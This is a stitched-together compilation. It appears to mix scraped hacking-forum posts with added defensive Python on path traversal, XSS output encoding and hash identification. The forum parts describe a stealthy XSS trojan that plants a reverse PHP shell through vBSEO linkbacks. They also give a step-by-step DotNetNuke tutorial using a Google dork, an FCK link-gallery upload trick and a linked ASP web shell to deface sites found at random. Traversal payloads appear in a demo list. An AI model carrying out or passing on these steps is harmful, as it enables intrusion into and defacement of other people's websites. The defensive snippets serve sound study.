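    """Canonicalise `user_path` (getnews.asp's `item`) beneath `root` and return
    the absolute path, or raise TraversalAttempt. Decoding happens before
    normalisation, and the final test compares resolved paths instead of
    searching the input for '..'."""
    root = posixpath.normpath(root)
    decoded = decode_fully(user_path).replace("\\", "/")  # a decoded %5c is a separator
    if "\x00" in decoded:
        raise TraversalAttempt("NUL byte in file name")
    if posixpath.isabs(decoded):
        raise TraversalAttempt("absolute path supplied")
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    if candidate != root and not candidate.startswith(root + "/"):
        raise TraversalAttempt(f"{user_path!r} resolves outside {root}")
    return candidate


def is_safe_path(root: str, user_path: str) -> bool:
    try:
        resolve_under_root(root, user_path)
        return True
    except TraversalAttempt:
        return False


if __name__ == "__main__":
    root = "/var/www/online/news"  # constructed document root
    for item in ["20March2003.html", "../../../../WINNT/win.ini",
                 "%2e%2e/%2e%2e/%2e%2e/etc/passwd", "..%5c..%5cwinnt/win.ini"]:
        print(f"{item!r:40} naive filter blocks: {naive_filter_blocks(item)!s:5} "
              f"resolves safely: {is_safe_path(root, item)}")
```

`posixpath` is used deliberately so the result is the same on any host; in a real handler the same comparison should be made against `os.path.realpath` output so that symbolic links inside the root cannot point back out of it.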

vbSEO-XSS to Reverse PHP Shell

XSS is not a big deal, or is it? On many occasions, I’ve seen this vulnerability being classified as useless, not serious, and being a low threat. What I’ve always had in mind is that it’s only the capabilities of the browser, and the hackers mind which sets the limit for a XSS attack.

It may seem impossible to do anything else other than stealing sessions, cookies and performing phishing, client side defacements etc. But take a look at the picture above, that is a reverse php shell automatically injected into the site, when a vBulletin administrator viewed a malicious linkback.

The vulnerability itself I’m referring to, is a 0day within vBSEO which exists within the administrator and moderator panel only. However, the attacker is able to inject persistent scripts via this linkback feature directly into the part of these panels handling these linkbacks.

In short, the attacker crafts a malicious HTML page as shown in the advisory. Then, the attacker clicks a link to the target forum with vBSEO installed, and when the target is reached, vBSEO performs a GET-request to the attacker’s malicious HTML page (if it’s served online and if RefBacks are enabled).

The title of this page is then loaded directly into the database, and an administrator can see it sanitized in the actual thread, but also in the admin and mod panel where the title is not sanitized at all, allowing the script to run.

What is actually possible?

After discovering and researching this vulnerability, I realised it was a fine case to do further studies on and then develop a XSS worm. Fortunately I got away from that idea due to the fact it could’ve been abused globally on forums with vBSEO installed. However, the idea itself was not bad so I began developing the payload aka the javascript, which would eventually inject a PHP payload via the nice plugin feature in vBulletin.

Initially, the XSS trojan I wrote should be able to do all of this silently without the user knowing, so instead of document.write being used, appendChild which uses DOM objects, was used instead. This took a bit more work in order to function better, but the result was that the visible window would not change to the affected user getting infected with this trojan.

When the user browses to, in this case, “Moderate Linkbacks”, the script executes as soon as the user hits that page. When this happens, the trojan checks whether infection has already happened once and, if not, continues. Then an iframe is created outside the visible frames, where the adminhash and securitytoken (CSRF token) are read and saved in a local variable in the browser.

Then a new form is injected into this iframe, which contains the adminhash and the securitytoken. The form itself contains the values needed to create a new and completely valid plugin which in this case, is PHP code. At this point, the script checks again if the user has already been infected and if not, the form is submitted, the plugin is created, and a cookie is set to prevent the script from going in loops.

Most administrators would notice the broken lock icon in case they use HTTPS / SSL, and then they would view the source. The great thing about using javascript to create HTML objects, especially with “appendChild” etc., is that it is not visible in the source. A debugger, such as Firebug shown in the picture above, is needed, unless the admin finds the malicious javascript payload and reads what it does, but then it might be too late.

During the execution of the XSS trojan, a time-out is set. When time runs out, the XSS trojan will try to delete itself, leaving almost no traces besides the possibly injected plugin and the remains of the hidden iframe outside the frames, which cannot be viewed due to the way HTML works in Firefox.

If the attacker was successful, and patient as well, he would eventually see that the target website had already connected back to retrieve the title, but also that another user had triggered the XSS Trojan which hopefully injected the PHP plugin specified by the attacker.

So what’s this tool I’ve been using during my presentation of this vulnerability? It’s a recently developed tool written in Python, where the payload is written in Javascript, freely available to anyone in the bottom of this blog. I recommend however, that a user of this tool looks inside the source code.

Is XSS a serious threat then?

Yes, it definitely is.
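The root cause described above is one rendering path (the moderation panel) that skipped the encoding the thread view applied. The following Python is an added example, not the author's tool and not vBSEO code; it models the linkback fetch storing the raw `<title>`, one encoder shared by every HTML text context, the unencoded variant for contrast, and a cheap alert check on stored titles. The fetched page and its `alert('x')` payload are constructed.

```python
import html
import re
from typing import Optional

TITLE_RE = re.compile(r"<title[^>]*>(.*?)</title>", re.IGNORECASE | re.DOTALL)
MAX_TITLE = 250

# Constructed page of the kind the refback fetch would retrieve; the payload is a
# harmless alert, used only to show that it is neutralised.
LINKBACK_PAGE = "<html><head><title>Nice post <script>alert('x')</script></title></head></html>"


def extract_title(page: str) -> Optional[str]:
    """What the refback fetch stores: the raw <title> text, whitespace-collapsed
    and truncated. Storing raw text is fine; the mistake the article describes
    is rendering it raw later."""
    m = TITLE_RE.search(page)
    if not m:
        return None
    return re.sub(r"\s+", " ", m.group(1)).strip()[:MAX_TITLE]


def looks_like_markup(title: str) -> bool:
    """Cheap alert signal for a stored title: tags, javascript: URLs or event
    handlers. Not a filter (encoding is the fix), just something to log on."""
    return bool(re.search(r"<\s*/?\s*[a-z]|javascript:|on[a-z]+\s*=", title, re.IGNORECASE))


def render_text(value: str) -> str:
    """The one encoder for every HTML text context: thread view and admin panel."""
    return html.escape(value, quote=True)


def render_thread_row(title: str) -> str:
    return f"<td class='linkback'>{render_text(title)}</td>"


def render_admin_row(title: str) -> str:
    # Same encoder as the public page; the vulnerability was this path skipping it.
    return f"<td class='moderate'>{render_text(title)}</td>"


def render_admin_row_vulnerable(title: str) -> str:
    # The behaviour the article describes: the title concatenated unencoded.
    return f"<td class='moderate'>{title}</td>"


if __name__ == "__main__":
    title = extract_title(LINKBACK_PAGE)
    print("stored title:", title, "| suspicious:", looks_like_markup(title))
    print("thread:", render_thread_row(title))
    print("admin (fixed):", render_admin_row(title))
    print("admin (as described):", render_admin_row_vulnerable(title))
```

The securitytoken read through the iframe is a CSRF defence and cannot help here: the injected script runs same-origin and simply reads it, which is exactly what the article walks through. Output encoding at every sink is the fix, and an alert on stored titles that contain markup gives a moderator the early warning the broken lock icon did not.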


DNN HACKING (DOT NET NUKE)

Hello. In this tutorial I will be explaining how to hack a website which has this vulnerability.

DotNetNuke is written in VB.NET, though the developer has begun to shift to C# for future core development.[4] It is distributed under both a Community Edition BSD-style license [3] and commercial proprietary licenses as the Professional and Enterprise Editions. DotNetNuke is extensible and customizable through the use of skins, modules, data providers, language packs and templates.

DotNetNuke uses a three-tier architecture model with a core framework providing support to the extensible modular structure. DotNetNuke can be extended using pluggable modules and providers that enable additional functionality. The look and feel of individual sites can be customized using skins. The following diagram illustrates the software layers of a typical DotNetNuke deployment: The current, 5.x generation of DotNetNuke requires Internet Information Services 6 and ASP.NET v2.0 to v4 and supports SQL Server 2005 and 2008. Previous generations of DotNetNuke supported SQL Server 2000 and ASP.NET v1.1.

The DotNetNuke application originally evolved out of another project, called the IBuySpy Workshop.[9] The IBuySpy Workshop application had been created by Shaun Walker [10] as an enhancement to the IBuySpy Portal that started as a sample application for the .NET Framework. Early versions of DotNetNuke were released by Shaun’s company, Perpetual Motion Inc, while later development was expanded by the open source community.

Now Lets begin the tutorial 

FIRST STEP: GO TO WWW.GOOGLE.COM

SECOND STEP: IN A SEARCH BOX TYPE…….

:inurl:/tabid/36/language/en-US/Default.aspx

THIRD STEP: you will find many sites, Select ONE OF THEM….

FOURTH STEP: 
For example take this site.

Example:

http://www.abc.com/Home/tabid/36/Lan…S/Default.aspx

Now replace

/Home/tabid/36/Language/en-US/Default.aspx 

with

/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 6:
You will get a Link Gallery page. So far so good!

Step 7: 
Don't do anything for now, wait for the next step…

Step 8:
Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')

Step 9:
You will Find the Upload Option

Step 10:
Select Root (the option you will see)

Step 11:

Upload your package Your Shell c99,c100 etc etc 

Here I will give you an ASP shell.

STEP 12: http://[PATH]/portals/0/dz4all.asp;me.jpg (eg)

DOWNLOAD LINK : http://www.mediafire.com/?ons6edehktvg737

STEP 13:

UPLOAD YOUR DEFACE PAGE

Dang, that's it, now it is defaced.

Hash Analyzer

Thought I’d share this because I see many people asking what kind of hashes the posted ones are, etc. This will tell you what kind of hash a particular one is, so you can pick the cracking algorithm accordingly.

Download Link : Here 

Note: This is NOT going to decrypt your hashes.

Source: http://dz4all.com/cc/t393.html

Screenshot :

Enjoy
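A tool like this works from the shape of the string: length and alphabet for bare digests, and a recognisable prefix for crypt-style and bcrypt strings. The following Python is an added example, not the tool linked above; it returns candidate families rather than a single answer, because a 32-character hex string is MD5, NTLM or MD4 equally well, and it recognises the `hash:salt` layout from the MD5 post above. The sample values in the demo are constructed.

```python
import re
from typing import Dict, List

HEX = "[0-9a-f]"

# Ordered: distinctive formats first, bare hex digests last (length only narrows them down).
FORMATS = [
    ("bcrypt", re.compile(r"^\$2[abxy]?\$\d{2}\$[./A-Za-z0-9]{53}$")),
    ("sha512crypt ($6$)", re.compile(r"^\$6\$")),
    ("sha256crypt ($5$)", re.compile(r"^\$5\$")),
    ("md5crypt ($1$)", re.compile(r"^\$1\$")),
    ("Apache apr1-md5 ($apr1$)", re.compile(r"^\$apr1\$")),
    ("MySQL 4.1+ (SHA1 of SHA1, leading '*')", re.compile(r"^\*[0-9A-F]{40}$")),
    ("MD5 / NTLM / MD4 / LM (32 hex)", re.compile(f"^{HEX}{{32}}$", re.IGNORECASE)),
    ("SHA-1 / RIPEMD-160 (40 hex)", re.compile(f"^{HEX}{{40}}$", re.IGNORECASE)),
    ("SHA-256 (64 hex)", re.compile(f"^{HEX}{{64}}$", re.IGNORECASE)),
    ("SHA-384 (96 hex)", re.compile(f"^{HEX}{{96}}$", re.IGNORECASE)),
    ("SHA-512 / Whirlpool (128 hex)", re.compile(f"^{HEX}{{128}}$", re.IGNORECASE)),
]


def identify_hash(value: str) -> Dict[str, object]:
    """Return the digest, any ':salt' suffix, and the candidate families whose
    format matches. Format alone cannot distinguish MD5 from NTLM; the source
    application (vBulletin, Windows, ...) settles that."""
    value = value.strip()
    digest, salt = value, None
    # 'hash:salt' is the export layout used in the MD5 post above; crypt-style
    # strings ($...$) carry their salt inside and must not be split.
    if ":" in value and not value.startswith("$"):
        digest, salt = value.split(":", 1)
    candidates: List[str] = [name for name, pat in FORMATS if pat.match(digest)]
    if salt is not None and candidates and candidates[0].startswith("MD5") and len(salt) == 3:
        candidates.insert(0, "salted MD5 with 3-char salt, the vBulletin 3/4 layout: md5(md5(pass).salt)")
    return {"digest": digest, "salt": salt, "candidates": candidates}


if __name__ == "__main__":
    # Constructed inputs: the record from the MD5 post plus placeholder strings of each shape.
    for sample in ["6dcd0f272fbb7f6f8ff3a8a5e96c45aa:Ws)", "$2a$10$" + "x" * 53,
                   "*" + "A" * 40, "a" * 40, "a" * 64, "$6$salt$hash", "not a hash"]:
        result = identify_hash(sample)
        print(f"{sample[:36]:38} salt={result['salt']!r:8} -> {result['candidates']}")
```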
